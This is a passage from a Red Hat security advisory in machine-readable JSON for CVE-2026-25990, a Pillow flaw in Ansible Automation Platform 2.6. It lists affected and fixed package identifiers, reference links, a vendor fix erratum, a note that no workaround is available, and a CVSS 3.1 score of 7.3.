"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
